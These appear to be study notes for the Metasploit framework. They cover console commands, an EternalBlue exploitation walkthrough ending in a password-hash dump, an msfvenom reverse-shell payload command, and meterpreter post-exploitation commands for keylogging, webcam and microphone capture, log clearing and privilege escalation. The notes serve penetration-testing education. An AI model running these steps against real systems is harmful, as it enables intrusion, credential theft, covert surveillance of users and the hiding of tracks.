

Metasploit is an open-source exploitation framework that provides a platform to automate and simplify the process of discovering, exploiting and reporting vulnerabilities in a target system. The framework integrates a large collection of exploits, payloads, and auxiliary modules to aid in a wide range of security testing tasks.



The steps for using Metasploit include:

Installing and setting up the Metasploit Framework on your computer. Finding a target and determining what vulnerabilities it may have. Selecting and configuring an appropriate exploit module in Metasploit. Launching the exploit against the target and assessing the results. Post-exploitation activities, such as gathering information, installing backdoors, or pivoting to other systems.

msfconsole use show options info search search apache search portscan set PARAMETER_NAME VALUE unset setg exploit -z check sessions -i msfvenom scanner/discovery/udp_sweep msfdb init db_status workspace -h Use msfdb to use stored information about current project/workspace Common vulnerable services:

  • HTTP

  • FTP

  • SMB

  • SSH

  • RDP

To exploit eternal blue:

msconsole search eternalblue use 0 show payloads set payload 2 set RHOSTS {targetIP} show options (ensure lhosts = {attackIP}) exploit Upon session connection, use CTRL+Z to put session in background use_shell_to_meterpreter show options set SESSION 1 sessions -u 1 hashdump

Msfvenom: used to generate payloads

msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=10.10.X.X LPORT=XXXX -f elf > rev_shell.elf

Meterpreter: metasploit payload with pentesting components Show meterpreter payloads: msfvenom --list payloads | grep meterpreter

Meterpreter Commands

Core commands

background: Backgrounds the current session exit: Terminate the Meterpreter session guid: Get the session GUID (Globally Unique Identifier) help: Displays the help menu info: Displays information about a Post module irb: Opens an interactive Ruby shell on the current session load: Loads one or more Meterpreter extensions migrate: Allows you to migrate Meterpreter to another process run: Executes a Meterpreter script or Post module sessions: Quickly switch to another session

File system commands

cd: Will change directory ls: Will list files in the current directory (dir will also work) pwd: Prints the current working directory edit: will allow you to edit a file cat: Will show the contents of a file to the screen rm: Will delete the specified file search: Will search for files upload: Will upload a file or directory download: Will download a file or directory

Networking commands

arp: Displays the host ARP (Address Resolution Protocol) cache ifconfig: Displays network interfaces available on the target system netstat: Displays the network connections portfwd: Forwards a local port to a remote service route: Allows you to view and modify the routing table

System commands

clearev: Clears the event logs execute: Executes a command getpid: Shows the current process identifier getuid: Shows the user that Meterpreter is running as kill: Terminates a process pkill: Terminates processes by name ps: Lists running processes reboot: Reboots the remote computer shell: Drops into a system command shell shutdown: Shuts down the remote computer sysinfo: Gets information about the remote system, such as OS

Others Commands (these will be listed under different menu categories in the help menu)

idletime: Returns the number of seconds the remote user has been idle keyscan_dump: Dumps the keystroke buffer keyscan_start: Starts capturing keystrokes keyscan_stop: Stops capturing keystrokes screenshare: Allows you to watch the remote user's desktop in real time screenshot: Grabs a screenshot of the interactive desktop record_mic: Records audio from the default microphone for X seconds webcam_chat: Starts a video chat webcam_list: Lists webcams webcam_snap: Takes a snapshot from the specified webcam webcam_stream: Plays a video stream from the specified webcam getsystem: Attempts to elevate your privilege to that of local system hashdump: Dumps the contents of the SAM database

Meterpreter Post Exploitation Commands

  • getuid: user Meterpreter using

  • ps: running processes

  • Migrate: interacting with other processes: migrate PID

  • Hashdump: dump content of SAM to get NTLM hashes

  • Search: locate files: search -f */txt

  • getsystem

  • Load command

  • Common paramaters:

    • RHOSTS

    • RPORT


    • LHOST

    • LPORT



  • The Metasploit official documentation, which provides in-depth information on how to use the tool and its various features.

  • Metasploit Unleashed, a free online resource that provides a comprehensive guide to using Metasploit, including tutorials and examples.

  • Metasploit YouTube channel, which features a variety of tutorials and demonstrations on how to use Metasploit.

  • Online forums and communities dedicated to Metasploit, where users can ask questions and share information.

  • Metasploit Pro, a paid version of the tool that includes additional features and support options. This can be a good resource for users who want additional assistance and resources for using Metasploit.

Last updated

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